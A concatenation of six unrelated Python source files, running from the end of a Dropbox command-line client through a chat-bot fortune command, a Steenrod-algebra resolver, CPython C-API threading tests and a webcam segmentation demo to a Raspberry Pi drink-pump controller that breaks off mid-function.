with closing(DropboxCommand(timeout=None)) as dc:
try:
result = dc.ignore_set_add(paths=absolute_paths)
if result[u"ignored"]:
console_print(u"Excluded: ")
lines = [relpath(path) for path in result[u"ignored"]]
for line in lines:
console_print(unicode(line))
except KeyError:
console_print(u"Couldn't add ignore path: daemon isn't responding")
except DropboxCommand.CommandError, e:
if e.args[0].startswith(u"No command exists by that name"):
console_print(u"This version of the client does not support this command.")
else:
console_print(u"Couldn't get ignore set: " + str(e))
except DropboxCommand.BadConnectionError, e:
console_print(u"Dropbox isn't responding! [%s]" % e)
except DropboxCommand.EOFError:
console_print(u"Dropbox daemon stopped.")
except DropboxCommand.CouldntConnectError, e:
console_print(u"Dropbox isn't running!")
elif sub_command == u"remove":
try:
with closing(DropboxCommand(timeout=None)) as dc:
try:
result = dc.ignore_set_remove(paths=absolute_paths)
if result[u"removed"]:
console_print(u"No longer excluded: ")
lines = [relpath(path) for path in result[u"removed"]]
for line in lines:
console_print(unicode(line))
except KeyError:
console_print(u"Couldn't remove ignore path: daemon isn't responding")
except DropboxCommand.CommandError, e:
if e.args[0].startswith(u"No command exists by that name"):
console_print(u"This version of the client does not support this command.")
else:
console_print(u"Couldn't get ignore set: " + str(e))
except DropboxCommand.BadConnectionError, e:
console_print(u"Dropbox isn't responding! [%s]" % e)
except DropboxCommand.EOFError:
console_print(u"Dropbox daemon stopped.")
except DropboxCommand.CouldntConnectError, e:
console_print(u"Dropbox isn't running!")
else:
console_print(exclude.__doc__, linebreak=False)
return
else:
console_print(exclude.__doc__, linebreak=False)
return
@command
def start(argv):
u"""start dropboxd
dropbox start [-i]
Starts the dropbox daemon, dropboxd. If dropboxd is already running, this will do nothing.
options:
-i --install auto install dropboxd if not available on the system
"""
should_install = "-i" in argv or "--install" in argv
# first check if dropbox is already running
if is_dropbox_running():
if not grab_link_url_if_necessary():
console_print(u"Dropbox is already running!")
return
console_print(u"Starting Dropbox...", linebreak=False)
console_flush()
if not start_dropbox():
if not should_install:
console_print()
console_print(u"The Dropbox daemon is not installed!")
console_print(u"Run \"dropbox start -i\" to install the daemon")
return
# install dropbox!!!
try:
download()
except:
traceback.print_exc()
else:
if GUI_AVAILABLE:
start_dropbox()
console_print(u"Done!")
else:
if start_dropbox():
if not grab_link_url_if_necessary():
console_print(u"Done!")
else:
if not grab_link_url_if_necessary():
console_print(u"Done!")
def can_reroll_autostart():
return u".config" in os.listdir(os.path.expanduser(u'~'))
def reroll_autostart(should_autostart):
home_dir = os.path.expanduser(u'~')
contents = os.listdir(home_dir)
# UBUNTU
if u".config" in contents:
autostart_dir = os.path.join(home_dir, u".config", u"autostart")
autostart_link = os.path.join(autostart_dir, u"dropbox.desktop")
if should_autostart:
if os.path.exists(DESKTOP_FILE):
if not os.path.exists(autostart_dir):
os.makedirs(autostart_dir)
shutil.copyfile(DESKTOP_FILE, autostart_link)
elif os.path.exists(autostart_link):
os.remove(autostart_link)
@command
def autostart(argv):
u"""automatically start dropbox at login
dropbox autostart [y/n]
options:
n dropbox will not start automatically at login
y dropbox will start automatically at login (default)
Note: May only work on current Ubuntu distributions.
"""
if len(argv) != 1:
console_print(''.join(autostart.__doc__.split('\n', 1)[1:]).decode('ascii'))
return
s = argv[0].lower()
if s.startswith('y') or s.startswith('-y'):
should_autostart = True
elif s.startswith('n') or s.startswith('-n'):
should_autostart = False
else:
should_autostart = None
if should_autostart is None:
console_print(autostart.__doc__,linebreak=False)
else:
reroll_autostart(should_autostart)
@command
def help(argv):
u"""provide help
dropbox help [COMMAND]
With no arguments, print a list of commands and a short description of each. With a command, print descriptive help on how to use the command.
"""
if not argv:
return usage(argv)
for command in commands:
if command == argv[0]:
console_print(commands[command].__doc__.split('\n', 1)[1].decode('ascii'))
return
for alias in aliases:
if alias == argv[0]:
console_print(aliases[alias].__doc__.split('\n', 1)[1].decode('ascii'))
return
console_print(u"unknown command '%s'" % argv[0], f=sys.stderr)
def usage(argv):
console_print(u"Dropbox command-line interface\n")
console_print(u"commands:\n")
console_print(u"Note: use dropbox help <command> to view usage for a specific command.\n")
out = []
for command in commands:
out.append((command, commands[command].__doc__.splitlines()[0]))
spacing = max(len(o[0])+3 for o in out)
for o in out:
console_print(" %-*s%s" % (spacing, o[0], o[1]))
console_print()
def main(argv):
global commands
# find out whether one of the known commands (or aliases) appears in the
# argv list and, if so, split argv at that point: everything before it is
# treated as global options, everything after it as the command's arguments
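# e.g. for argv == ["dropbox.py", "exclude", "add", "foo"] the cut lands on "exclude"
# and commands["exclude"] is invoked with ["add", "foo"]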
cut = None
for i in range(len(argv)):
if argv[i] in commands or argv[i] in aliases:
cut = i
break
if cut is None:
usage(argv)
os._exit(0)
return
# lol no options for now
globaloptionparser = optparse.OptionParser()
globaloptionparser.parse_args(argv[0:cut])
# now dispatch and run
result = None
if argv[cut] in commands:
result = commands[argv[cut]](argv[cut+1:])
elif argv[cut] in aliases:
result = aliases[argv[cut]](argv[cut+1:])
# flush, in case output is rerouted to a file.
console_flush()
# done
return result
if __name__ == "__main__":
ret = main(sys.argv)
if ret is not None:
sys.exit(ret)
|
zoltar.py
|
import logging, coloredlogs
from threading import Thread
from random import choice
from modules.config import *
from modules.database import Database
from modules.timer import Timer
database = Database(db_host, db_user, db_pass, db_name, db_autocommit)
database.database_connection()
class Zoltar:
CommandMain = 'zoltar'
CommandMainOptions = []
CommandResponses = []
ZoltarCooldown = []
def __init__(self, user, question):
self.user = user
self.cooldown_timer = Timer(self.user, ZOLTAR_COOLDOWN, Zoltar.ZoltarCooldown, "ZoltarCooldown")
self.minutes = int(ZOLTAR_COOLDOWN / 60)
self.question = question
self.responses = [
'it is certain',
'it is decidedly so',
'without a doubt',
'yes, definitely',
'you may rely on it',
'as I see it, yes',
'most likely',
'outlook good',
'yes',
'signs point to yes',
'better not tell you now',
'cannot predict now',
'don\'t count on it',
'my reply is no',
'my sources say no',
'outlook not so good',
'very doubtful',
]
def execute_command(self, command):
if(self.user not in Zoltar.ZoltarCooldown):
self.prediction()
def prediction(self):
from modules.bot import bot_msg
response = choice(self.responses)
bot_msg("Zoltar takes {} of your {} and looks into the crystal ball.. he responds, \"{} {}\" deIlluminati".format(ZOLTAR_COST, CURRENCY, response, self.user))
database.db_minus_points_user(self.user, ZOLTAR_COST)
Thread(target=self.cooldown_timer.cooldown_run).start()
|
resolution.py
|
import asyncio
import time
import threading
from message_passing_tree.prelude import *
from message_passing_tree import MathAgent
from .fp import Matrix
from .algebra import AdemAlgebra
from .module import FDModule
from . import RustResolution
import rust_ext
RustResolutionHomomorphism = rust_ext.ResolutionHomomorphism
def st_to_xy(s, t):
return (t-s, s)
def xy_to_st(x, y):
return (y, x + y)
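# Conventions: (s, t) = (filtration degree, internal degree); chart coordinates are
# (x, y) = (stem, filtration) = (t - s, s), so st_to_xy and xy_to_st are mutually inverse.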
def make_unit_module():
A = AdemAlgebra(2)
M = FDModule(A, "M", 0)
M.add_generator(0, "x0")
M.freeze()
return M
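# The "unit" module: a single generator x0 in degree 0 over the mod-2 Adem (Steenrod)
# algebra; Resolver falls back to this when no module is supplied.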
@subscribe_to("*")
@collect_handlers(inherit=False)
class Resolver(MathAgent):
def __init__(self, name, chart=None, module=None):
super().__init__()
if module is None:
self.M = make_unit_module()
else:
self.M = module
self.name=name
self.A = self.M.algebra
self.rust_res = RustResolution(self.M)
self.rust_res.freeze()
self.loop = asyncio.get_event_loop() # Need this so that worker thread can submit events to run on the same event loop as main thread
self.filtration_one_products = self.A.default_filtration_one_products()[:-1]
self.class_handlers = []
self.structline_handlers = []
self.max_degree = -1
self.target_max_degree = -1
self.finished_degrees = set()
self.unfinished_degrees = {}
self.unit_resolution = None
self.chain_maps_to_unit_resolution = [[None] * 200 for _ in range(200)]
self.chart = chart
def resolve(self, n):
t = threading.Thread(target=self._resolve_st_rectangle(n), daemon=True)
t.start()
# self._resolve_thread(n)()
def _resolve_st_rectangle(self, n):
def run():
asyncio.set_event_loop(self.loop)
self.A.compute_basis(n)
self.target_max_degree = n
self.rust_res.extend_through_degree(n, n)
t0 = time.time()
for t in range(n):
for s in range(n):
self.step_if_needed(s,t)
t1 = time.time()
time_elapsed = t1 - t0
print(f"Time taken to resolve {self.name} from stem {self.max_degree + 1} to stem {self.target_max_degree}:", time_elapsed)
self.max_degree = self.target_max_degree
return run
def _resolve_xy_rectangle(self, n):
def run():
self.A.compute_basis(2 * n) # over the x/y rectangle the largest internal degree is t = x + y <= 2 * (n - 1)
self.target_max_degree = n
self.rust_res.extend_through_degree(n, 2 * n)
t0 = time.time()
for x in range(n):
for y in range(n):
self.step_if_needed(*xy_to_st(x,y))
t1 = time.time()
time_elapsed = t1 - t0
print(f"Time taken to resolve {self.name} from stem {self.max_degree + 1} to stem {self.target_max_degree}:", time_elapsed)
self.max_degree = self.target_max_degree
return run
def step_if_needed(self, i, j):
if (i, j) not in self.finished_degrees:
self.rust_res.step_resolution(i,j)
asyncio.ensure_future(self.step_after(i, j))
# if self.rust_res.number_of_gens_in_bidegree(i, j) > 0:
# print(i, j, self.rust_res.number_of_gens_in_bidegree(i, j))
# f = asyncio.run_coroutine_threadsafe(
# self.broadcast(["resolution", "finished_bidegree"], i, j),
# self.loop
# )
# f.result()
self.finished_degrees.add((i, j))
async def step_after(self, s, t):
if not self.chart:
return
self.add_classes(s, t)
products = self.compute_filtration_one_products(s, t)
for product in products:
source_t = product["source_t"]
source_s = product["source_s"]
target_t = t
target_s = s
table = product["table"]
for (source_idx, row) in enumerate(iter(table)):
for (target_idx, entry) in enumerate(iter(row)):
if entry != 0:
await self.add_structline(
source_s, source_t, source_idx,
target_s, target_t, target_idx
)
await self.chart.update_a()
def add_classes(self, s, t):
for i in range(self.rust_res.number_of_gens_in_bidegree(s, t)):
self.chart.sseq.add_class(*st_to_xy(s, t))
async def add_structline(self,
source_s, source_t, source_idx,
target_s, target_t, target_idx
):
try:
source = self.chart.sseq.class_by_idx(*st_to_xy(source_s, source_t), source_idx)
target = self.chart.sseq.class_by_idx(*st_to_xy(target_s, target_t), target_idx)
self.chart.sseq.add_structline(source, target)
except Exception as e:
await self.send_error_a("", exception=e)
def cocycle_string(self, x, y, idx):
return self.rust_res.cocycle_string(*xy_to_st(x, y), idx)
def compute_filtration_one_products(self, target_s, target_t):
if target_s == 0:
return []
source_s = target_s - 1
source = self.rust_res.module(source_s)
target = self.rust_res.module(target_s)
target_dim = target.number_of_gens_in_degree(target_t)
result = []
for (op_name, op_degree, op_index) in self.filtration_one_products:
source_t = target_t - op_degree
if source_t - source_s < self.rust_res.min_degree:
continue
source_dim = source.number_of_gens_in_degree(source_t)
d = self.rust_res.differential(target_s)
products = [[0 for _ in range(target_dim)] for _ in range(source_dim)]
for target_idx in range(target_dim):
dx = d.output(target_t, target_idx)
for source_idx in range(source_dim):
idx = source.operation_generator_to_index(op_degree, op_index, source_t, source_idx)
products[source_idx][target_idx] = dx.entry(idx)
result.append({"source_s" : source_s, "source_t" : source_t, "table" : products})
return result
def construct_maps_to_unit_resolution_in_bidegree(self, s, t):
if self.unit_resolution is None:
raise ValueError("Need to define self.unit_resolution first.")
if self.chain_maps_to_unit_resolution[s][t] is not None:
return
p = self.rust_res.prime()
# Populate the arrays if the ResolutionHomomorphisms have not been defined.
num_gens = self.rust_res.module(s).number_of_gens_in_degree(t)
self.chain_maps_to_unit_resolution[s][t] = []
if num_gens == 0:
return
unit_vector = Matrix(p, num_gens, 1)
for idx in range(num_gens):
f = RustResolutionHomomorphism(
f"(hom_deg : {s}, int_deg : {t}, idx : {idx})",
self.rust_res, self.unit_resolution,
s, t
)
unit_vector[idx].set_entry(0, 1)
f.extend_step(s, t, unit_vector)
unit_vector[idx].set_to_zero_pure()
self.chain_maps_to_unit_resolution[s][t].append(f)
def construct_maps_to_unit_resolution(self):
for s in range(self.max_degree):
for t in range(self.max_degree):
self.construct_maps_to_unit_resolution_in_bidegree(s, t)
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from __future__ import with_statement
import sys
import time
import random
import unittest
from test import test_support
try:
import threading
except ImportError:
threading = None
import _testcapi
@unittest.skipUnless(threading, 'Threading required for this test.')
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break;
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l has grown to n entries
count = 0;
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and test_support.verbose:
print "(%i)"%(len(l),),
for i in xrange(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and test_support.verbose:
print "(%i)"%(len(l),)
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
for i in range(context.nThreads):
t = threading.Thread(target=self.pendingcalls_thread, args = (context,))
t.start()
threads.append(t)
self.pendingcalls_wait(context.l, n, context)
for t in threads:
t.join()
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and test_support.verbose:
print "finished threads: ", nFinished
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
def test_main():
for name in dir(_testcapi):
if name.startswith('test_'):
test = getattr(_testcapi, name)
if test_support.verbose:
print "internal", name
try:
test()
except _testcapi.error:
raise test_support.TestFailed, sys.exc_info()[1]
# some extra thread-state tests driven via _testcapi
def TestThreadState():
if test_support.verbose:
print "auto-thread-state"
idents = []
def callback():
idents.append(thread.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
if idents.count(thread.get_ident()) != 3:
raise test_support.TestFailed, \
"Couldn't find main thread correctly in the list"
if threading:
import thread
import time
TestThreadState()
t=threading.Thread(target=TestThreadState)
t.start()
t.join()
test_support.run_unittest(TestPendingCalls)
if __name__ == "__main__":
test_main()
|
live_webcam.py
|
#!/usr/bin/env python
import json
import cv2
import os
import tensorflow as tf
import time
import numpy as np
import keras
import datetime
import argparse
from keras import backend as K
from keras.models import load_model
from keras.models import model_from_json
from copy import copy
from threading import Thread
from tqdm import tqdm
"""
Demonstrates live webcam background segmentation on average CPU workstations.
"""
class FixedDropout(keras.layers.Dropout):
"""
Custom dropout layer defined in EfficientNet; the definition is needed while loading the graph
"""
def _get_noise_shape(self, inputs):
"""Noise shape for input
Args:
----
inputs(np.array)
Returns:
-------
tuple(noise_shape): noise shape based on the input dimensions
"""
if self.noise_shape is None:
return self.noise_shape
symbolic_shape = keras.backend.shape(inputs)
noise_shape = [
symbolic_shape[axis] if shape is None else shape
for axis, shape in enumerate(self.noise_shape)
]
return tuple(noise_shape)
class WebStream:
"""Class to acquire webcam frames in a threaded fashion
"""
def __init__(self, src=0):
"""Initialize the webcam stream
Args:
-----
src(int or video_file_path): source to capture frames
Returns:
-------
None
"""
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
self.stopped = False
def start(self):
"""Start separate thread to acquire frames
Args:
-----
None
Returns:
--------
None
"""
Thread(target=self.update, args=()).start()
return self
def update(self):
"""Update the frame which is captured
Args:
-----
None
Returns:
--------
None
"""
while True:
if self.stopped:
self.stream.release()
return
(self.grabbed, self.frame) = self.stream.read()
def read(self):
"""Update the frame which is currently read
Args:
-----
None
Returns:
--------
frame(np.array): input image frame
"""
return self.frame
def stop(self):
"""Stop capturing frames from the input stream
Args:
-----
None
Returns:
--------
None
"""
self.stopped = True
class Segmentation(object):
def __init__(self, args):
self.split_h, self.split_w = (
int(args["webcam_height"]) - 150,
int(args["webcam_width"] // 2),
)
self.h, self.w, self.c = 128, 128, 3
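# Model input resolution (128x128 RGB): frames are downscaled to this for inference
# and the predicted mask is resized back to the display resolution in postprocess().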
self.threshold = 0.5
self.base_model_path = args["base_model_path"]
def load_model(self):
"""Load keras model based on path
Args:
-----
base_model_path(str): path to the frozen model
Returns:
--------
model(keras.model): model loaded with weights
"""
full_dir_path = os.path.abspath(os.path.dirname(__file__))
# load the model from graph & setup the weights
print("===============Loading Model==============")
base_model_full_path = full_dir_path + self.base_model_path
with open(base_model_full_path + "Unet_EB0_128_graph.json", "r") as f:
model_json = json.load(f)
model = model_from_json(
model_json,
custom_objects={"swish": tf.nn.swish, "FixedDropout": FixedDropout},
)
model.load_weights(base_model_full_path + "Unet_EB0_128_weights.h5")
print("===============Model loaded==============")
return model
def preprocess(self, frame):
"""Preprocess input image
Args:
-----
frame(np.array): input image
Returns:
--------
images(tuple): tuple of preprocessed images
"""
orig = cv2.resize(frame, (self.split_h, self.split_w))
orig_normal = np.divide(orig, 255, dtype=np.float32)
orig_blur = cv2.blur(
orig_normal, (int(self.split_h / 16), int(self.split_w / 16)), 0
)
image = cv2.resize(orig, (self.h, self.w), interpolation=cv2.INTER_AREA)
image = image[..., ::-1] # switch BGR to RGB
image = np.divide(image, 255, dtype=np.float32)
image = image[np.newaxis, ...]
return image, orig_normal, orig_blur
def postprocess(self, mask, orig_normal, orig_blur):
"""Preprocess input image
Args:
-----
mask(np.array): input masked image
orig_normal(np.array): input normalized image
orig_blur(np.array): input blurred image
Returns:
--------
new_image(np.array): final background segmented masked image
"""
# remove background and apply background blur for better visually appealing stream
mask_dst = cv2.resize(
mask, (self.split_h, self.split_w), interpolation=cv2.INTER_CUBIC
)
mask_dst = cv2.blur(mask_dst, (15, 15), 0)
new_image = np.multiply(orig_normal, mask_dst[:, :, None], dtype=np.float32)
mask = np.dstack((mask_dst, mask_dst, mask_dst))
new_image = np.where(mask > self.threshold, new_image, orig_blur)
return new_image
if __name__ == "__main__":
# assumes webcam resolution is 1920x1080
parser = argparse.ArgumentParser()
parser.add_argument(
"-I",
"--input-device",
type=int,
default=0,
dest="input_device",
help="Device number input",
)
parser.add_argument(
"-F",
"--full-screen",
type=int,
default=0,
dest="full_screen",
help="Full screen",
)
parser.add_argument(
"-H",
"--webcam-height",
type=int,
default=1080,
dest="webcam_height",
help="Webcam height resolution",
)
parser.add_argument(
"-W",
"--webcam-width",
type=int,
default=1920,
dest="webcam_width",
help="Webcam width resolution",
)
parser.add_argument(
"-P",
"--model_path",
type=str,
default="/./data/assets/saved_models/",
dest="base_model_path",
help="Path to frozen model",
)
args = vars(parser.parse_args())
h, w, c = 128, 128, 3
seg = Segmentation(args)
model = seg.load_model()
print("===============Warming up the graph==============")
r = np.random.rand(1, h, w, c)
for i in tqdm(range(500)):
pr_mask = model.predict(r)
print("===============Graph warmed up===============")
ws = WebStream(src=args["input_device"])
cam = ws.start()
total_time = []
frames = 0
myframe = None
try:
while True:
frame = cam.read()
myframe = copy(frame)
t1 = time.time()
# preprocess
image, orig_normal, orig_blur = seg.preprocess(myframe)
# model prediction
pr_mask = model.predict(image)
mask = pr_mask[..., 0].squeeze()
# postprocess
new_image = seg.postprocess(mask, orig_normal, orig_blur)
# display the frame
color_and_mask = np.concatenate((orig_normal, new_image), axis=1)
total_time.append(time.time() - t1)
if args["full_screen"]:
cv2.namedWindow("Segmentation", cv2.WND_PROP_FULLSCREEN)
cv2.setWindowProperty(
"Segmentation", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN
)
cv2.imshow("Segmentation", color_and_mask)
if cv2.waitKey(1) & 0xFF == ord("q"):
cam.stop()
cv2.destroyAllWindows()
break
frames += 1
except Exception as e:
print(e)
cam.stop()
cv2.destroyAllWindows()
print("FPS {t}".format(t=(frames / sum(total_time))))
print("Total Frames {f}".format(f=frames))
|
bartender_sh1106.py
|
from luma.core.interface.serial import i2c
from luma.core.render import canvas
from luma.oled.device import sh1106, ssd1306
from PIL import ImageFont, ImageDraw, Image
import time
import sys
import RPi.GPIO as GPIO
import json
import threading
import traceback
# from dotstar import Adafruit_DotStar
from menu import MenuItem, Menu, Back, MenuContext, MenuDelegate
from drinks import drink_list, drink_options
GPIO.setmode(GPIO.BCM)
SCREEN_WIDTH = 128
SCREEN_HEIGHT = 64
LEFT_BTN_PIN = 13
LEFT_PIN_BOUNCE = 1000
RIGHT_BTN_PIN = 5
RIGHT_PIN_BOUNCE = 2000
# OLED_RESET_PIN = 15
# OLED_DC_PIN = 16
NUMBER_NEOPIXELS = 45
NEOPIXEL_DATA_PIN = 26
NEOPIXEL_CLOCK_PIN = 6
NEOPIXEL_BRIGHTNESS = 64
FLOW_RATE = 60.0/100.0
class Bartender(MenuDelegate):
def __init__(self):
self.running = False
# set the oled screen height
self.screen_width = SCREEN_WIDTH
self.screen_height = SCREEN_HEIGHT
self.btn1Pin = LEFT_BTN_PIN
self.btn2Pin = RIGHT_BTN_PIN
# configure interrupts for buttons
GPIO.setup(self.btn1Pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(self.btn2Pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
# configure screen
# spi_bus = 0
# spi_device = 0
# gpio = gaugette.gpio.GPIO()
# spi = gaugette.spi.SPI(spi_bus, spi_device)
serial = i2c(port=1, address=0x3C)
device = sh1106(serial)
# Very important... This lets py-gaugette 'know' what pins to use in order to reset the display
# self.led = gaugette.ssd1306.SSD1306(gpio, spi, reset_pin=OLED_RESET_PIN, dc_pin=OLED_DC_PIN, rows=self.screen_height, cols=self.screen_width) # Change rows & cols values depending on your display dimensions.
self.led = device
self.oled_font = ImageFont.truetype('FreeSans.ttf', 12)
# self.led.begin()
# self.led.clear_display()
# self.led.display()
# self.led.invert_display()
# time.sleep(0.5)
# self.led.normal_display()
time.sleep(0.5)
# load the pump configuration from file
self.pump_configuration = Bartender.readPumpConfiguration()
for pump in self.pump_configuration.keys():
GPIO.setup(
self.pump_configuration[pump]["pin"], GPIO.OUT, initial=GPIO.HIGH)
# setup pixels:
self.numpixels = NUMBER_NEOPIXELS # Number of LEDs in strip
# Here's how to control the strip from any two GPIO pins:
datapin = NEOPIXEL_DATA_PIN
clockpin = NEOPIXEL_CLOCK_PIN
#self.strip = Adafruit_DotStar(self.numpixels, datapin, clockpin)
#self.strip.begin() # Initialize pins for output
# Limit brightness to ~1/4 duty cycle
#self.strip.setBrightness(NEOPIXEL_BRIGHTNESS)
# turn everything off
# for i in range(0, self.numpixels):
# self.strip.setPixelColor(i, 0)
# self.strip.show()
print ("Done initializing")
@staticmethod
def readPumpConfiguration():
return json.load(open('pump_config.json'))
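# Pump-to-fluid assignments are persisted in pump_config.json, so selections made from
# the configuration menu survive restarts (see writePumpConfiguration below).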
@staticmethod
def writePumpConfiguration(configuration):
with open("pump_config.json", "w") as jsonFile:
json.dump(configuration, jsonFile)
def startInterrupts(self):
GPIO.add_event_detect(self.btn1Pin, GPIO.FALLING,
callback=self.left_btn, bouncetime=LEFT_PIN_BOUNCE)
GPIO.add_event_detect(self.btn2Pin, GPIO.FALLING,
callback=self.right_btn, bouncetime=RIGHT_PIN_BOUNCE)
def stopInterrupts(self):
GPIO.remove_event_detect(self.btn1Pin)
GPIO.remove_event_detect(self.btn2Pin)
def buildMenu(self, drink_list, drink_options):
# create a new main menu
m = Menu("Main Menu")
# add drink options
drink_opts = []
for d in drink_list:
drink_opts.append(MenuItem('drink', d["name"], {
"ingredients": d["ingredients"]}))
configuration_menu = Menu("Configure")
# add pump configuration options
pump_opts = []
for p in sorted(self.pump_configuration.keys()):
config = Menu(self.pump_configuration[p]["name"])
# add fluid options for each pump
for opt in drink_options:
# star the selected option
selected = "*" if opt["value"] == self.pump_configuration[p]["value"] else ""
config.addOption(MenuItem('pump_selection', opt["name"], {
"key": p, "value": opt["value"], "name": opt["name"]}))
# add a back button so the user can return without modifying
config.addOption(Back("Back"))
config.setParent(configuration_menu)
pump_opts.append(config)
# add pump menus to the configuration menu
configuration_menu.addOptions(pump_opts)
# add a back button to the configuration menu
configuration_menu.addOption(Back("Back"))
# adds an option that cleans all pumps to the configuration menu
configuration_menu.addOption(MenuItem('clean', 'Clean'))
configuration_menu.setParent(m)
m.addOptions(drink_opts)
m.addOption(configuration_menu)
# create a menu context
self.menuContext = MenuContext(m, self)
def filterDrinks(self, menu):
"""
Removes any drinks that can't be handled by the pump configuration
"""
for i in menu.options:
if (i.type == "drink"):
i.visible = False
ingredients = i.attributes["ingredients"]
presentIng = 0
for ing in ingredients.keys():
for p in self.pump_configuration.keys():
if (ing == self.pump_configuration[p]["value"]):
presentIng += 1
if (presentIng == len(ingredients.keys())):
i.visible = True
elif (i.type == "menu"):
self.filterDrinks(i)
def selectConfigurations(self, menu):
"""
Adds a selection star to the pump configuration option
"""
for i in menu.options:
if (i.type == "pump_selection"):
key = i.attributes["key"]
if (self.pump_configuration[key]["value"] == i.attributes["value"]):
i.name = "%s %s" % (i.attributes["name"], "*")
else:
i.name = i.attributes["name"]
elif (i.type == "menu"):
self.selectConfigurations(i)
def prepareForRender(self, menu):
self.filterDrinks(menu)
self.selectConfigurations(menu)
return True
def menuItemClicked(self, menuItem):
if (menuItem.type == "drink"):
self.makeDrink(menuItem.name, menuItem.attributes["ingredients"])
return True
elif(menuItem.type == "pump_selection"):
self.pump_configuration[menuItem.attributes["key"]
]["value"] = menuItem.attributes["value"]
Bartender.writePumpConfiguration(self.pump_configuration)
return True
elif(menuItem.type == "clean"):
self.clean()
return True
return False
def clean(self):
waitTime = 20
pumpThreads = []
# cancel any button presses while the drink is being made
# self.stopInterrupts()
self.running = True
for pump in self.pump_configuration.keys():
pump_t = threading.Thread(target=self.pour, args=(
self.pump_configuration[pump]["pin"], waitTime))
pumpThreads.append(pump_t)
# start the pump threads
for thread in pumpThreads:
thread.start()
# start the progress bar
self.progressBar(waitTime)
# wait for threads to finish
for thread in pumpThreads:
thread.join()
# show the main menu
self.menuContext.showMenu()
# sleep for a couple seconds to make sure the interrupts don't get triggered
time.sleep(2)
# reenable interrupts
# self.startInterrupts()
self.running = False
def displayMenuItem(self, menuItem):
print(menuItem.name)
# self.led.clear_display()
# self.led.draw_text2(0,20,menuItem.name,2)
# self.led.display()
with canvas(self.led) as draw:
draw.rectangle(self.led.bounding_box, outline="white", fill="black")
draw.text((10, 10), menuItem.name,
font=self.oled_font, fill="white")
def cycleLights(self):
t = threading.currentThread()
head = 0 # Index of first 'on' pixel
tail = -10 # Index of last 'off' pixel
color = 0xFF0000 # 'On' color (starts red)
# while getattr(t, "do_run", True):
# self.strip.setPixelColor(head, color) # Turn on 'head' pixel
# self.strip.setPixelColor(tail, 0) # Turn off 'tail'
# self.strip.show() # Refresh strip
# time.sleep(1.0 / 50) # Pause 20 milliseconds (~50 fps)
# head += 1 # Advance head position
# if(head >= self.numpixels): # Off end of strip?
# head = 0 # Reset to start
# color >>= 8 # Red->green->blue->black
# if(color == 0):
# color = 0xFF0000 # If black, reset to red
# tail += 1 # Advance tail position
# if(tail >= self.numpixels):
# tail = 0 # Off end? Reset
def lightsEndingSequence(self):
# make lights green
# for i in range(0, self.numpixels):
# self.strip.setPixelColor(i, 0xFF0000)
# self.strip.show()
time.sleep(5)
# turn lights off
# for i in range(0, self.numpixels):
# self.strip.setPixelColor(i, 0)
# self.strip.show()
def pour(self, pin, waitTime):
GPIO.output(pin, GPIO.LOW)
time.sleep(waitTime)
GPIO.output(pin, GPIO.HIGH)
def progressBar(self, waitTime):
interval = waitTime / 100.0
# for x in range(1, 101):
# self.led.clear_display()
# self.updateProgressBar(x, y=35)
# self.led.display()
# time.sleep(interval)
def makeDrink(self, drink, ingredients):
# cancel any button presses while the drink is being made
# self.stopInterrupts()
self.running = True
# launch a thread to control lighting
# lightsThread = threading.Thread(target=self.cycleLights)
# lightsThread.start()
# Parse the drink ingredients and spawn threads for pumps
maxTime = 0
pumpThreads = []
for ing in ingredients.keys():
for pump in self.pump_configuration.keys():
if ing == self.pump_configuration[pump]["value"]:
waitTime = ingredients[ing] / float(self.pump_configuration[pump]["mlpersec"])
if (waitTime > maxTime):
maxTime = waitTime
pump_t = threading.Thread(target=self.pour, args=(
self.pump_configuration[pump]["pin"], waitTime))
pumpThreads.append(pump_t)
# start the pump threads
for thread in pumpThreads:
thread.start()
# start the progress bar
self.progressBar(maxTime)
# wait for threads to finish
for thread in pumpThreads:
thread.join()
# show the main menu
self.menuContext.showMenu()
# stop the light thread
#lightsThread.do_run = False
#lightsThread.join()
# show the ending sequence lights
# self.lightsEndingSequence()
# sleep for a couple seconds to make sure the interrupts don't get triggered
time.sleep(2)
# reenable interrupts
# self.startInterrupts()
self.running = False
def left_btn(self, ctx):
if not self.running:
self.menuContext.advance()
def right_btn(self, ctx):
if not self.running:
self.menuContext.select()
def updateProgressBar(self, percent, x=15, y=15):
height = 10
width = self.screen_width-2*x
# for w in range(0, width):
# self.led.draw_pixel(w + x, y)
# self.led.draw_pixel(w + x, y + height)
# for h in range(0, height):
# self.led.draw_pixel(x, h + y)
# self.led.draw_pixel(self.screen_width-x, h + y)
# for p in range(0, percent):
# p_loc = int(p/100.0*width)
# self.led.draw_pixel(x + p_loc, h + y)
def run(self):
self.startInterrupts()
# main loop
try:
while True:
time.sleep(0.1)
except KeyboardInterrupt:
